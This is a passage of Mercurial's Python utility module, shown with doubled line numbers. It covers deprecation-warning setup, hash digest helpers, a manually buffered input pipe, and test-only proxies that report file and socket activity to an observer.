154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
155 if _dowarn:
155 if _dowarn:
156 # explicitly unfilter our warning for python 2.7
156 # explicitly unfilter our warning for python 2.7
157 #
157 #
158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
159 # However, module name set through PYTHONWARNINGS was exactly matched, so
159 # However, module name set through PYTHONWARNINGS was exactly matched, so
160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
165 if _dowarn and pycompat.ispy3:
165 if _dowarn and pycompat.ispy3:
166 # silence warning emitted by passing user string to re.sub()
166 # silence warning emitted by passing user string to re.sub()
167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
168 r'mercurial')
168 r'mercurial')
169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
170 DeprecationWarning, r'mercurial')
170 DeprecationWarning, r'mercurial')
171 # TODO: reinvent imp.is_frozen()
171 # TODO: reinvent imp.is_frozen()
172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
173 DeprecationWarning, r'mercurial')
173 DeprecationWarning, r'mercurial')
174
174
175 def nouideprecwarn(msg, version, stacklevel=1):
175 def nouideprecwarn(msg, version, stacklevel=1):
176 """Issue an python native deprecation warning
176 """Issue an python native deprecation warning
177
177
178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
179 """
179 """
180 if _dowarn:
180 if _dowarn:
181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
182 " update your code.)") % version
182 " update your code.)") % version
183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
184
184
185 DIGESTS = {
185 DIGESTS = {
186 'md5': hashlib.md5,
186 'md5': hashlib.md5,
187 'sha1': hashlib.sha1,
187 'sha1': hashlib.sha1,
188 'sha512': hashlib.sha512,
188 'sha512': hashlib.sha512,
189 }
189 }
190 # List of digest types from strongest to weakest
190 # List of digest types from strongest to weakest
191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
192
192
193 for k in DIGESTS_BY_STRENGTH:
193 for k in DIGESTS_BY_STRENGTH:
194 assert k in DIGESTS
194 assert k in DIGESTS
195
195
196 class digester(object):
196 class digester(object):
197 """helper to compute digests.
197 """helper to compute digests.
198
198
199 This helper can be used to compute one or more digests given their name.
199 This helper can be used to compute one or more digests given their name.
200
200
201 >>> d = digester([b'md5', b'sha1'])
201 >>> d = digester([b'md5', b'sha1'])
202 >>> d.update(b'foo')
202 >>> d.update(b'foo')
203 >>> [k for k in sorted(d)]
203 >>> [k for k in sorted(d)]
204 ['md5', 'sha1']
204 ['md5', 'sha1']
205 >>> d[b'md5']
205 >>> d[b'md5']
206 'acbd18db4cc2f85cedef654fccc4a4d8'
206 'acbd18db4cc2f85cedef654fccc4a4d8'
207 >>> d[b'sha1']
207 >>> d[b'sha1']
208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
209 >>> digester.preferred([b'md5', b'sha1'])
209 >>> digester.preferred([b'md5', b'sha1'])
210 'sha1'
210 'sha1'
211 """
211 """
212
212
213 def __init__(self, digests, s=''):
213 def __init__(self, digests, s=''):
214 self._hashes = {}
214 self._hashes = {}
215 for k in digests:
215 for k in digests:
216 if k not in DIGESTS:
216 if k not in DIGESTS:
217 raise error.Abort(_('unknown digest type: %s') % k)
217 raise error.Abort(_('unknown digest type: %s') % k)
218 self._hashes[k] = DIGESTS[k]()
218 self._hashes[k] = DIGESTS[k]()
219 if s:
219 if s:
220 self.update(s)
220 self.update(s)
221
221
222 def update(self, data):
222 def update(self, data):
223 for h in self._hashes.values():
223 for h in self._hashes.values():
224 h.update(data)
224 h.update(data)
225
225
226 def __getitem__(self, key):
226 def __getitem__(self, key):
227 if key not in DIGESTS:
227 if key not in DIGESTS:
228 raise error.Abort(_('unknown digest type: %s') % k)
228 raise error.Abort(_('unknown digest type: %s') % k)
229 return nodemod.hex(self._hashes[key].digest())
229 return nodemod.hex(self._hashes[key].digest())
230
230
231 def __iter__(self):
231 def __iter__(self):
232 return iter(self._hashes)
232 return iter(self._hashes)
233
233
234 @staticmethod
234 @staticmethod
235 def preferred(supported):
235 def preferred(supported):
236 """returns the strongest digest type in both supported and DIGESTS."""
236 """returns the strongest digest type in both supported and DIGESTS."""
237
237
238 for k in DIGESTS_BY_STRENGTH:
238 for k in DIGESTS_BY_STRENGTH:
239 if k in supported:
239 if k in supported:
240 return k
240 return k
241 return None
241 return None
242
242
243 class digestchecker(object):
243 class digestchecker(object):
244 """file handle wrapper that additionally checks content against a given
244 """file handle wrapper that additionally checks content against a given
245 size and digests.
245 size and digests.
246
246
247 d = digestchecker(fh, size, {'md5': '...'})
247 d = digestchecker(fh, size, {'md5': '...'})
248
248
249 When multiple digests are given, all of them are validated.
249 When multiple digests are given, all of them are validated.
250 """
250 """
251
251
252 def __init__(self, fh, size, digests):
252 def __init__(self, fh, size, digests):
253 self._fh = fh
253 self._fh = fh
254 self._size = size
254 self._size = size
255 self._got = 0
255 self._got = 0
256 self._digests = dict(digests)
256 self._digests = dict(digests)
257 self._digester = digester(self._digests.keys())
257 self._digester = digester(self._digests.keys())
258
258
259 def read(self, length=-1):
259 def read(self, length=-1):
260 content = self._fh.read(length)
260 content = self._fh.read(length)
261 self._digester.update(content)
261 self._digester.update(content)
262 self._got += len(content)
262 self._got += len(content)
263 return content
263 return content
264
264
265 def validate(self):
265 def validate(self):
266 if self._size != self._got:
266 if self._size != self._got:
267 raise error.Abort(_('size mismatch: expected %d, got %d') %
267 raise error.Abort(_('size mismatch: expected %d, got %d') %
268 (self._size, self._got))
268 (self._size, self._got))
269 for k, v in self._digests.items():
269 for k, v in self._digests.items():
270 if v != self._digester[k]:
270 if v != self._digester[k]:
271 # i18n: first parameter is a digest name
271 # i18n: first parameter is a digest name
272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
273 (k, v, self._digester[k]))
273 (k, v, self._digester[k]))
274
274
275 try:
275 try:
276 buffer = buffer
276 buffer = buffer
277 except NameError:
277 except NameError:
278 def buffer(sliceable, offset=0, length=None):
278 def buffer(sliceable, offset=0, length=None):
279 if length is not None:
279 if length is not None:
280 return memoryview(sliceable)[offset:offset + length]
280 return memoryview(sliceable)[offset:offset + length]
281 return memoryview(sliceable)[offset:]
281 return memoryview(sliceable)[offset:]
282
282
283 _chunksize = 4096
283 _chunksize = 4096
284
284
285 class bufferedinputpipe(object):
285 class bufferedinputpipe(object):
286 """a manually buffered input pipe
286 """a manually buffered input pipe
287
287
288 Python will not let us use buffered IO and lazy reading with 'polling' at
288 Python will not let us use buffered IO and lazy reading with 'polling' at
289 the same time. We cannot probe the buffer state and select will not detect
289 the same time. We cannot probe the buffer state and select will not detect
290 that data are ready to read if they are already buffered.
290 that data are ready to read if they are already buffered.
291
291
292 This class let us work around that by implementing its own buffering
292 This class let us work around that by implementing its own buffering
293 (allowing efficient readline) while offering a way to know if the buffer is
293 (allowing efficient readline) while offering a way to know if the buffer is
294 empty from the output (allowing collaboration of the buffer with polling).
294 empty from the output (allowing collaboration of the buffer with polling).
295
295
296 This class lives in the 'util' module because it makes use of the 'os'
296 This class lives in the 'util' module because it makes use of the 'os'
297 module from the python stdlib.
297 module from the python stdlib.
298 """
298 """
299 def __new__(cls, fh):
299 def __new__(cls, fh):
300 # If we receive a fileobjectproxy, we need to use a variation of this
300 # If we receive a fileobjectproxy, we need to use a variation of this
301 # class that notifies observers about activity.
301 # class that notifies observers about activity.
302 if isinstance(fh, fileobjectproxy):
302 if isinstance(fh, fileobjectproxy):
303 cls = observedbufferedinputpipe
303 cls = observedbufferedinputpipe
304
304
305 return super(bufferedinputpipe, cls).__new__(cls)
305 return super(bufferedinputpipe, cls).__new__(cls)
306
306
307 def __init__(self, input):
307 def __init__(self, input):
308 self._input = input
308 self._input = input
309 self._buffer = []
309 self._buffer = []
310 self._eof = False
310 self._eof = False
311 self._lenbuf = 0
311 self._lenbuf = 0
312
312
313 @property
313 @property
314 def hasbuffer(self):
314 def hasbuffer(self):
315 """True is any data is currently buffered
315 """True is any data is currently buffered
316
316
317 This will be used externally a pre-step for polling IO. If there is
317 This will be used externally a pre-step for polling IO. If there is
318 already data then no polling should be set in place."""
318 already data then no polling should be set in place."""
319 return bool(self._buffer)
319 return bool(self._buffer)
320
320
321 @property
321 @property
322 def closed(self):
322 def closed(self):
323 return self._input.closed
323 return self._input.closed
324
324
325 def fileno(self):
325 def fileno(self):
326 return self._input.fileno()
326 return self._input.fileno()
327
327
328 def close(self):
328 def close(self):
329 return self._input.close()
329 return self._input.close()
330
330
331 def read(self, size):
331 def read(self, size):
332 while (not self._eof) and (self._lenbuf < size):
332 while (not self._eof) and (self._lenbuf < size):
333 self._fillbuffer()
333 self._fillbuffer()
334 return self._frombuffer(size)
334 return self._frombuffer(size)
335
335
336 def unbufferedread(self, size):
336 def unbufferedread(self, size):
337 if not self._eof and self._lenbuf == 0:
337 if not self._eof and self._lenbuf == 0:
338 self._fillbuffer(max(size, _chunksize))
338 self._fillbuffer(max(size, _chunksize))
339 return self._frombuffer(min(self._lenbuf, size))
339 return self._frombuffer(min(self._lenbuf, size))
340
340
341 def readline(self, *args, **kwargs):
341 def readline(self, *args, **kwargs):
342 if len(self._buffer) > 1:
342 if len(self._buffer) > 1:
343 # this should not happen because both read and readline end with a
343 # this should not happen because both read and readline end with a
344 # _frombuffer call that collapse it.
344 # _frombuffer call that collapse it.
345 self._buffer = [''.join(self._buffer)]
345 self._buffer = [''.join(self._buffer)]
346 self._lenbuf = len(self._buffer[0])
346 self._lenbuf = len(self._buffer[0])
347 lfi = -1
347 lfi = -1
348 if self._buffer:
348 if self._buffer:
349 lfi = self._buffer[-1].find('\n')
349 lfi = self._buffer[-1].find('\n')
350 while (not self._eof) and lfi < 0:
350 while (not self._eof) and lfi < 0:
351 self._fillbuffer()
351 self._fillbuffer()
352 if self._buffer:
352 if self._buffer:
353 lfi = self._buffer[-1].find('\n')
353 lfi = self._buffer[-1].find('\n')
354 size = lfi + 1
354 size = lfi + 1
355 if lfi < 0: # end of file
355 if lfi < 0: # end of file
356 size = self._lenbuf
356 size = self._lenbuf
357 elif len(self._buffer) > 1:
357 elif len(self._buffer) > 1:
358 # we need to take previous chunks into account
358 # we need to take previous chunks into account
359 size += self._lenbuf - len(self._buffer[-1])
359 size += self._lenbuf - len(self._buffer[-1])
360 return self._frombuffer(size)
360 return self._frombuffer(size)
361
361
362 def _frombuffer(self, size):
362 def _frombuffer(self, size):
363 """return at most 'size' data from the buffer
363 """return at most 'size' data from the buffer
364
364
365 The data are removed from the buffer."""
365 The data are removed from the buffer."""
366 if size == 0 or not self._buffer:
366 if size == 0 or not self._buffer:
367 return ''
367 return ''
368 buf = self._buffer[0]
368 buf = self._buffer[0]
369 if len(self._buffer) > 1:
369 if len(self._buffer) > 1:
370 buf = ''.join(self._buffer)
370 buf = ''.join(self._buffer)
371
371
372 data = buf[:size]
372 data = buf[:size]
373 buf = buf[len(data):]
373 buf = buf[len(data):]
374 if buf:
374 if buf:
375 self._buffer = [buf]
375 self._buffer = [buf]
376 self._lenbuf = len(buf)
376 self._lenbuf = len(buf)
377 else:
377 else:
378 self._buffer = []
378 self._buffer = []
379 self._lenbuf = 0
379 self._lenbuf = 0
380 return data
380 return data
381
381
382 def _fillbuffer(self, size=_chunksize):
382 def _fillbuffer(self, size=_chunksize):
383 """read data to the buffer"""
383 """read data to the buffer"""
384 data = os.read(self._input.fileno(), size)
384 data = os.read(self._input.fileno(), size)
385 if not data:
385 if not data:
386 self._eof = True
386 self._eof = True
387 else:
387 else:
388 self._lenbuf += len(data)
388 self._lenbuf += len(data)
389 self._buffer.append(data)
389 self._buffer.append(data)
390
390
391 return data
391 return data
392
392
393 def mmapread(fp):
393 def mmapread(fp):
394 try:
394 try:
395 fd = getattr(fp, 'fileno', lambda: fp)()
395 fd = getattr(fp, 'fileno', lambda: fp)()
396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
397 except ValueError:
397 except ValueError:
398 # Empty files cannot be mmapped, but mmapread should still work. Check
398 # Empty files cannot be mmapped, but mmapread should still work. Check
399 # if the file is empty, and if so, return an empty buffer.
399 # if the file is empty, and if so, return an empty buffer.
400 if os.fstat(fd).st_size == 0:
400 if os.fstat(fd).st_size == 0:
401 return ''
401 return ''
402 raise
402 raise
403
403
404 class fileobjectproxy(object):
404 class fileobjectproxy(object):
405 """A proxy around file objects that tells a watcher when events occur.
405 """A proxy around file objects that tells a watcher when events occur.
406
406
407 This type is intended to only be used for testing purposes. Think hard
407 This type is intended to only be used for testing purposes. Think hard
408 before using it in important code.
408 before using it in important code.
409 """
409 """
410 __slots__ = (
410 __slots__ = (
411 r'_orig',
411 r'_orig',
412 r'_observer',
412 r'_observer',
413 )
413 )
414
414
415 def __init__(self, fh, observer):
415 def __init__(self, fh, observer):
416 object.__setattr__(self, r'_orig', fh)
416 object.__setattr__(self, r'_orig', fh)
417 object.__setattr__(self, r'_observer', observer)
417 object.__setattr__(self, r'_observer', observer)
418
418
419 def __getattribute__(self, name):
419 def __getattribute__(self, name):
420 ours = {
420 ours = {
421 r'_observer',
421 r'_observer',
422
422
423 # IOBase
423 # IOBase
424 r'close',
424 r'close',
425 # closed if a property
425 # closed if a property
426 r'fileno',
426 r'fileno',
427 r'flush',
427 r'flush',
428 r'isatty',
428 r'isatty',
429 r'readable',
429 r'readable',
430 r'readline',
430 r'readline',
431 r'readlines',
431 r'readlines',
432 r'seek',
432 r'seek',
433 r'seekable',
433 r'seekable',
434 r'tell',
434 r'tell',
435 r'truncate',
435 r'truncate',
436 r'writable',
436 r'writable',
437 r'writelines',
437 r'writelines',
438 # RawIOBase
438 # RawIOBase
439 r'read',
439 r'read',
440 r'readall',
440 r'readall',
441 r'readinto',
441 r'readinto',
442 r'write',
442 r'write',
443 # BufferedIOBase
443 # BufferedIOBase
444 # raw is a property
444 # raw is a property
445 r'detach',
445 r'detach',
446 # read defined above
446 # read defined above
447 r'read1',
447 r'read1',
448 # readinto defined above
448 # readinto defined above
449 # write defined above
449 # write defined above
450 }
450 }
451
451
452 # We only observe some methods.
452 # We only observe some methods.
453 if name in ours:
453 if name in ours:
454 return object.__getattribute__(self, name)
454 return object.__getattribute__(self, name)
455
455
456 return getattr(object.__getattribute__(self, r'_orig'), name)
456 return getattr(object.__getattribute__(self, r'_orig'), name)
457
457
458 def __nonzero__(self):
458 def __nonzero__(self):
459 return bool(object.__getattribute__(self, r'_orig'))
459 return bool(object.__getattribute__(self, r'_orig'))
460
460
461 __bool__ = __nonzero__
461 __bool__ = __nonzero__
462
462
463 def __delattr__(self, name):
463 def __delattr__(self, name):
464 return delattr(object.__getattribute__(self, r'_orig'), name)
464 return delattr(object.__getattribute__(self, r'_orig'), name)
465
465
466 def __setattr__(self, name, value):
466 def __setattr__(self, name, value):
467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
468
468
469 def __iter__(self):
469 def __iter__(self):
470 return object.__getattribute__(self, r'_orig').__iter__()
470 return object.__getattribute__(self, r'_orig').__iter__()
471
471
472 def _observedcall(self, name, *args, **kwargs):
472 def _observedcall(self, name, *args, **kwargs):
473 # Call the original object.
473 # Call the original object.
474 orig = object.__getattribute__(self, r'_orig')
474 orig = object.__getattribute__(self, r'_orig')
475 res = getattr(orig, name)(*args, **kwargs)
475 res = getattr(orig, name)(*args, **kwargs)
476
476
477 # Call a method on the observer of the same name with arguments
477 # Call a method on the observer of the same name with arguments
478 # so it can react, log, etc.
478 # so it can react, log, etc.
479 observer = object.__getattribute__(self, r'_observer')
479 observer = object.__getattribute__(self, r'_observer')
480 fn = getattr(observer, name, None)
480 fn = getattr(observer, name, None)
481 if fn:
481 if fn:
482 fn(res, *args, **kwargs)
482 fn(res, *args, **kwargs)
483
483
484 return res
484 return res
485
485
486 def close(self, *args, **kwargs):
486 def close(self, *args, **kwargs):
487 return object.__getattribute__(self, r'_observedcall')(
487 return object.__getattribute__(self, r'_observedcall')(
488 r'close', *args, **kwargs)
488 r'close', *args, **kwargs)
489
489
490 def fileno(self, *args, **kwargs):
490 def fileno(self, *args, **kwargs):
491 return object.__getattribute__(self, r'_observedcall')(
491 return object.__getattribute__(self, r'_observedcall')(
492 r'fileno', *args, **kwargs)
492 r'fileno', *args, **kwargs)
493
493
494 def flush(self, *args, **kwargs):
494 def flush(self, *args, **kwargs):
495 return object.__getattribute__(self, r'_observedcall')(
495 return object.__getattribute__(self, r'_observedcall')(
496 r'flush', *args, **kwargs)
496 r'flush', *args, **kwargs)
497
497
498 def isatty(self, *args, **kwargs):
498 def isatty(self, *args, **kwargs):
499 return object.__getattribute__(self, r'_observedcall')(
499 return object.__getattribute__(self, r'_observedcall')(
500 r'isatty', *args, **kwargs)
500 r'isatty', *args, **kwargs)
501
501
502 def readable(self, *args, **kwargs):
502 def readable(self, *args, **kwargs):
503 return object.__getattribute__(self, r'_observedcall')(
503 return object.__getattribute__(self, r'_observedcall')(
504 r'readable', *args, **kwargs)
504 r'readable', *args, **kwargs)
505
505
506 def readline(self, *args, **kwargs):
506 def readline(self, *args, **kwargs):
507 return object.__getattribute__(self, r'_observedcall')(
507 return object.__getattribute__(self, r'_observedcall')(
508 r'readline', *args, **kwargs)
508 r'readline', *args, **kwargs)
509
509
510 def readlines(self, *args, **kwargs):
510 def readlines(self, *args, **kwargs):
511 return object.__getattribute__(self, r'_observedcall')(
511 return object.__getattribute__(self, r'_observedcall')(
512 r'readlines', *args, **kwargs)
512 r'readlines', *args, **kwargs)
513
513
514 def seek(self, *args, **kwargs):
514 def seek(self, *args, **kwargs):
515 return object.__getattribute__(self, r'_observedcall')(
515 return object.__getattribute__(self, r'_observedcall')(
516 r'seek', *args, **kwargs)
516 r'seek', *args, **kwargs)
517
517
518 def seekable(self, *args, **kwargs):
518 def seekable(self, *args, **kwargs):
519 return object.__getattribute__(self, r'_observedcall')(
519 return object.__getattribute__(self, r'_observedcall')(
520 r'seekable', *args, **kwargs)
520 r'seekable', *args, **kwargs)
521
521
522 def tell(self, *args, **kwargs):
522 def tell(self, *args, **kwargs):
523 return object.__getattribute__(self, r'_observedcall')(
523 return object.__getattribute__(self, r'_observedcall')(
524 r'tell', *args, **kwargs)
524 r'tell', *args, **kwargs)
525
525
526 def truncate(self, *args, **kwargs):
526 def truncate(self, *args, **kwargs):
527 return object.__getattribute__(self, r'_observedcall')(
527 return object.__getattribute__(self, r'_observedcall')(
528 r'truncate', *args, **kwargs)
528 r'truncate', *args, **kwargs)
529
529
530 def writable(self, *args, **kwargs):
530 def writable(self, *args, **kwargs):
531 return object.__getattribute__(self, r'_observedcall')(
531 return object.__getattribute__(self, r'_observedcall')(
532 r'writable', *args, **kwargs)
532 r'writable', *args, **kwargs)
533
533
534 def writelines(self, *args, **kwargs):
534 def writelines(self, *args, **kwargs):
535 return object.__getattribute__(self, r'_observedcall')(
535 return object.__getattribute__(self, r'_observedcall')(
536 r'writelines', *args, **kwargs)
536 r'writelines', *args, **kwargs)
537
537
538 def read(self, *args, **kwargs):
538 def read(self, *args, **kwargs):
539 return object.__getattribute__(self, r'_observedcall')(
539 return object.__getattribute__(self, r'_observedcall')(
540 r'read', *args, **kwargs)
540 r'read', *args, **kwargs)
541
541
542 def readall(self, *args, **kwargs):
542 def readall(self, *args, **kwargs):
543 return object.__getattribute__(self, r'_observedcall')(
543 return object.__getattribute__(self, r'_observedcall')(
544 r'readall', *args, **kwargs)
544 r'readall', *args, **kwargs)
545
545
546 def readinto(self, *args, **kwargs):
546 def readinto(self, *args, **kwargs):
547 return object.__getattribute__(self, r'_observedcall')(
547 return object.__getattribute__(self, r'_observedcall')(
548 r'readinto', *args, **kwargs)
548 r'readinto', *args, **kwargs)
549
549
550 def write(self, *args, **kwargs):
550 def write(self, *args, **kwargs):
551 return object.__getattribute__(self, r'_observedcall')(
551 return object.__getattribute__(self, r'_observedcall')(
552 r'write', *args, **kwargs)
552 r'write', *args, **kwargs)
553
553
554 def detach(self, *args, **kwargs):
554 def detach(self, *args, **kwargs):
555 return object.__getattribute__(self, r'_observedcall')(
555 return object.__getattribute__(self, r'_observedcall')(
556 r'detach', *args, **kwargs)
556 r'detach', *args, **kwargs)
557
557
558 def read1(self, *args, **kwargs):
558 def read1(self, *args, **kwargs):
559 return object.__getattribute__(self, r'_observedcall')(
559 return object.__getattribute__(self, r'_observedcall')(
560 r'read1', *args, **kwargs)
560 r'read1', *args, **kwargs)
561
561
562 class observedbufferedinputpipe(bufferedinputpipe):
562 class observedbufferedinputpipe(bufferedinputpipe):
563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
564
564
565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
566 bypass ``fileobjectproxy``. Because of this, we need to make
566 bypass ``fileobjectproxy``. Because of this, we need to make
567 ``bufferedinputpipe`` aware of these operations.
567 ``bufferedinputpipe`` aware of these operations.
568
568
569 This variation of ``bufferedinputpipe`` can notify observers about
569 This variation of ``bufferedinputpipe`` can notify observers about
570 ``os.read()`` events. It also re-publishes other events, such as
570 ``os.read()`` events. It also re-publishes other events, such as
571 ``read()`` and ``readline()``.
571 ``read()`` and ``readline()``.
572 """
572 """
573 def _fillbuffer(self):
573 def _fillbuffer(self):
574 res = super(observedbufferedinputpipe, self)._fillbuffer()
574 res = super(observedbufferedinputpipe, self)._fillbuffer()
575
575
576 fn = getattr(self._input._observer, r'osread', None)
576 fn = getattr(self._input._observer, r'osread', None)
577 if fn:
577 if fn:
578 fn(res, _chunksize)
578 fn(res, _chunksize)
579
579
580 return res
580 return res
581
581
582 # We use different observer methods because the operation isn't
582 # We use different observer methods because the operation isn't
583 # performed on the actual file object but on us.
583 # performed on the actual file object but on us.
584 def read(self, size):
584 def read(self, size):
585 res = super(observedbufferedinputpipe, self).read(size)
585 res = super(observedbufferedinputpipe, self).read(size)
586
586
587 fn = getattr(self._input._observer, r'bufferedread', None)
587 fn = getattr(self._input._observer, r'bufferedread', None)
588 if fn:
588 if fn:
589 fn(res, size)
589 fn(res, size)
590
590
591 return res
591 return res
592
592
593 def readline(self, *args, **kwargs):
593 def readline(self, *args, **kwargs):
594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
595
595
596 fn = getattr(self._input._observer, r'bufferedreadline', None)
596 fn = getattr(self._input._observer, r'bufferedreadline', None)
597 if fn:
597 if fn:
598 fn(res)
598 fn(res)
599
599
600 return res
600 return res
601
601
602 PROXIED_SOCKET_METHODS = {
602 PROXIED_SOCKET_METHODS = {
603 r'makefile',
603 r'makefile',
604 r'recv',
604 r'recv',
605 r'recvfrom',
605 r'recvfrom',
606 r'recvfrom_into',
606 r'recvfrom_into',
607 r'recv_into',
607 r'recv_into',
608 r'send',
608 r'send',
609 r'sendall',
609 r'sendall',
610 r'sendto',
610 r'sendto',
611 r'setblocking',
611 r'setblocking',
612 r'settimeout',
612 r'settimeout',
613 r'gettimeout',
613 r'gettimeout',
614 r'setsockopt',
614 r'setsockopt',
615 }
615 }
616
616
617 class socketproxy(object):
617 class socketproxy(object):
618 """A proxy around a socket that tells a watcher when events occur.
618 """A proxy around a socket that tells a watcher when events occur.
619
619
620 This is like ``fileobjectproxy`` except for sockets.
620 This is like ``fileobjectproxy`` except for sockets.
621
621
622 This type is intended to only be used for testing purposes. Think hard
622 This type is intended to only be used for testing purposes. Think hard
623 before using it in important code.
623 before using it in important code.
624 """
624 """
625 __slots__ = (
625 __slots__ = (
626 r'_orig',
626 r'_orig',
627 r'_observer',
627 r'_observer',
628 )
628 )
629
629
630 def __init__(self, sock, observer):
630 def __init__(self, sock, observer):
631 object.__setattr__(self, r'_orig', sock)
631 object.__setattr__(self, r'_orig', sock)
632 object.__setattr__(self, r'_observer', observer)
632 object.__setattr__(self, r'_observer', observer)
633
633
634 def __getattribute__(self, name):
634 def __getattribute__(self, name):
635 if name in PROXIED_SOCKET_METHODS:
635 if name in PROXIED_SOCKET_METHODS:
636 return object.__getattribute__(self, name)
636 return object.__getattribute__(self, name)
637
637
638 return getattr(object.__getattribute__(self, r'_orig'), name)
638 return getattr(object.__getattribute__(self, r'_orig'), name)
639
639
640 def __delattr__(self, name):
640 def __delattr__(self, name):
641 return delattr(object.__getattribute__(self, r'_orig'), name)
641 return delattr(object.__getattribute__(self, r'_orig'), name)
642
642
643 def __setattr__(self, name, value):
643 def __setattr__(self, name, value):
644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
645
645
646 def __nonzero__(self):
646 def __nonzero__(self):
647 return bool(object.__getattribute__(self, r'_orig'))
647 return bool(object.__getattribute__(self, r'_orig'))
648
648
649 __bool__ = __nonzero__
649 __bool__ = __nonzero__
650
650
651 def _observedcall(self, name, *args, **kwargs):
651 def _observedcall(self, name, *args, **kwargs):
652 # Call the original object.
652 # Call the original object.
653 orig = object.__getattribute__(self, r'_orig')
653 orig = object.__getattribute__(self, r'_orig')
654 res = getattr(orig, name)(*args, **kwargs)
654 res = getattr(orig, name)(*args, **kwargs)
655
655
656 # Call a method on the observer of the same name with arguments
656 # Call a method on the observer of the same name with arguments
657 # so it can react, log, etc.
657 # so it can react, log, etc.
658 observer = object.__getattribute__(self, r'_observer')
658 observer = object.__getattribute__(self, r'_observer')
659 fn = getattr(observer, name, None)
659 fn = getattr(observer, name, None)
660 if fn:
660 if fn:
661 fn(res, *args, **kwargs)
661 fn(res, *args, **kwargs)
662
662
663 return res
663 return res
664
664
665 def makefile(self, *args, **kwargs):
665 def makefile(self, *args, **kwargs):
666 res = object.__getattribute__(self, r'_observedcall')(
666 res = object.__getattribute__(self, r'_observedcall')(
667 r'makefile', *args, **kwargs)
667 r'makefile', *args, **kwargs)
668
668
669 # The file object may be used for I/O. So we turn it into a
669 # The file object may be used for I/O. So we turn it into a
670 # proxy using our observer.
670 # proxy using our observer.
671 observer = object.__getattribute__(self, r'_observer')
671 observer = object.__getattribute__(self, r'_observer')
672 return makeloggingfileobject(observer.fh, res, observer.name,
672 return makeloggingfileobject(observer.fh, res, observer.name,
673 reads=observer.reads,
673 reads=observer.reads,
674 writes=observer.writes,
674 writes=observer.writes,
675 logdata=observer.logdata,
675 logdata=observer.logdata,
676 logdataapis=observer.logdataapis)
676 logdataapis=observer.logdataapis)
677
677
678 def recv(self, *args, **kwargs):
678 def recv(self, *args, **kwargs):
679 return object.__getattribute__(self, r'_observedcall')(
679 return object.__getattribute__(self, r'_observedcall')(
680 r'recv', *args, **kwargs)
680 r'recv', *args, **kwargs)
681
681
682 def recvfrom(self, *args, **kwargs):
682 def recvfrom(self, *args, **kwargs):
683 return object.__getattribute__(self, r'_observedcall')(
683 return object.__getattribute__(self, r'_observedcall')(
684 r'recvfrom', *args, **kwargs)
684 r'recvfrom', *args, **kwargs)
685
685
686 def recvfrom_into(self, *args, **kwargs):
686 def recvfrom_into(self, *args, **kwargs):
687 return object.__getattribute__(self, r'_observedcall')(
687 return object.__getattribute__(self, r'_observedcall')(
688 r'recvfrom_into', *args, **kwargs)
688 r'recvfrom_into', *args, **kwargs)
689
689
690 def recv_into(self, *args, **kwargs):
690 def recv_into(self, *args, **kwargs):
691 return object.__getattribute__(self, r'_observedcall')(
691 return object.__getattribute__(self, r'_observedcall')(
692 r'recv_info', *args, **kwargs)
692 r'recv_info', *args, **kwargs)
693
693
694 def send(self, *args, **kwargs):
694 def send(self, *args, **kwargs):
695 return object.__getattribute__(self, r'_observedcall')(
695 return object.__getattribute__(self, r'_observedcall')(
696 r'send', *args, **kwargs)
696 r'send', *args, **kwargs)
697
697
698 def sendall(self, *args, **kwargs):
698 def sendall(self, *args, **kwargs):
699 return object.__getattribute__(self, r'_observedcall')(
699 return object.__getattribute__(self, r'_observedcall')(
700 r'sendall', *args, **kwargs)
700 r'sendall', *args, **kwargs)
701
701
702 def sendto(self, *args, **kwargs):
702 def sendto(self, *args, **kwargs):
703 return object.__getattribute__(self, r'_observedcall')(
703 return object.__getattribute__(self, r'_observedcall')(
704 r'sendto', *args, **kwargs)
704 r'sendto', *args, **kwargs)
705
705
706 def setblocking(self, *args, **kwargs):
706 def setblocking(self, *args, **kwargs):
